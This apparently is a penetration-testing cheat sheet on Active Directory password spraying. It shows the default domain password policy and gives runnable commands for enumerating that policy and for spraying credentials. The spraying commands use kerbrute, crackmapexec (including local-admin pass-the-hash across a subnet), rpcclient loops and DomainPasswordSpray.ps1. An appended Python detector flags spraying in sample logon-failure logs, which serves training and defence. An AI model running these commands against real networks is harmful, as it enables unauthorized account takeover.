Password Spraying

Password Policy

The default password policy when a new domain is created is as follows, and there have been plenty of organizations that never changed this policy:

Policy                                        Default Value
--------------------------------------------  -------------
Enforce password history                      24 days
Maximum password age                          42 days
Minimum password age                          1 day
Minimum password length                       7
Password must meet complexity requirements    Enabled
Store passwords using reversible encryption   Disabled
Account lockout duration                      Not set
Account lockout threshold                     0
Reset account lockout counter after           Not set

Enumerating the Password Policy - from Linux

crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol
rpcclient -U "" -N 172.16.5.5

rpcclient $> querydominfo
rpcclient $> getdompwinfo
enum4linux -P 172.16.5.5
enum4linux-ng -P 172.16.5.5 -oA enum4linuxOutput
ldapsearch -h 172.16.5.5 -x -b "DC=EXAMPLE,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

Enumerating the Password Policy - from Windows

C:\kryot> net accounts
PS C:\htb> import-module .\PowerView.ps1
PS C:\htb> Get-DomainPolicy

Password Spraying

Internal Password Spraying - from Linux

Bash oneliner

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

Kerbrute

kerbrute passwordspray -d example.local --dc 172.16.5.5 valid_users.txt Welcome1

Crackmapexec

sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

Local Admin Spraying with CrackMapExec

sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

Internal Password Spraying - from Windows

DomainPasswordSpray.ps1

PS C:\kryot> Import-Module .\DomainPasswordSpray.ps1
PS C:\kryot> Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue

Kerbrute.exe

kerbrute.exe passwordspray -d example.local --dc 172.16.5.5 valid_users.txt Welcome1
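Defensive counterpart to the spraying commands above, added here and not part of the original notes: a small detector for the footprint these tools leave in the domain controller's failed-logon events (4625 for NTLM/local, 4771 for Kerberos pre-auth). The log format, source IPs and usernames are constructed samples, not real data.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample failures (not real logs): "timestamp,event_id,source_ip,target_user".
# 4625 = NTLM/local logon failure, 4771 = Kerberos pre-auth failure (what kerbrute leaves).
SAMPLE_LOG = """\
2024-01-10T09:00:01,4771,10.0.5.20,avazquez
2024-01-10T09:00:02,4771,10.0.5.20,bjones
2024-01-10T09:00:02,4771,10.0.5.20,cmartin
2024-01-10T09:00:03,4771,10.0.5.20,dlee
2024-01-10T09:00:04,4771,10.0.5.20,eperez
2024-01-10T09:00:05,4771,10.0.5.20,fkim
2024-01-10T09:00:06,4771,10.0.5.20,gsmith
2024-01-10T09:15:00,4625,10.0.7.33,avazquez
2024-01-10T09:15:30,4625,10.0.7.33,avazquez
2024-01-10T09:16:00,4625,10.0.7.33,avazquez
"""
FAILURE_EVENTS = {"4625", "4771"}

def parse(log_text):
    """Return (timestamp, source_ip, user) for each logon-failure line."""
    events = []
    for line in log_text.splitlines():
        ts, event_id, src, user = line.strip().split(",")
        if event_id in FAILURE_EVENTS:
            events.append((datetime.fromisoformat(ts), src, user.lower()))
    return events

def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Spray signature: one source, failures against many DISTINCT accounts in a
    short window (a brute force is the opposite: one account, many tries).
    Returns {source_ip: max distinct users seen inside any window}."""
    by_src = defaultdict(list)
    for ts, src, user in events:
        by_src[src].append((ts, user))
    hits = {}
    for src, fails in by_src.items():
        fails.sort()                      # sliding window over chronological failures
        for i, (start, _) in enumerate(fails):
            users = {u for ts, u in fails[i:] if ts - start <= window}
            if len(users) >= min_users:
                hits[src] = max(hits.get(src, 0), len(users))
    return hits

if __name__ == "__main__":
    # 10.0.5.20 sprayed 7 accounts in 5 seconds; 10.0.7.33 hammered one account
    print(detect_spray(parse(SAMPLE_LOG)))   # {'10.0.5.20': 7}
```

Because a lockout threshold of 0 (the default above) never blocks the source, this distinct-user count is the signal to alert on; the single-account source is left to the lockout policy.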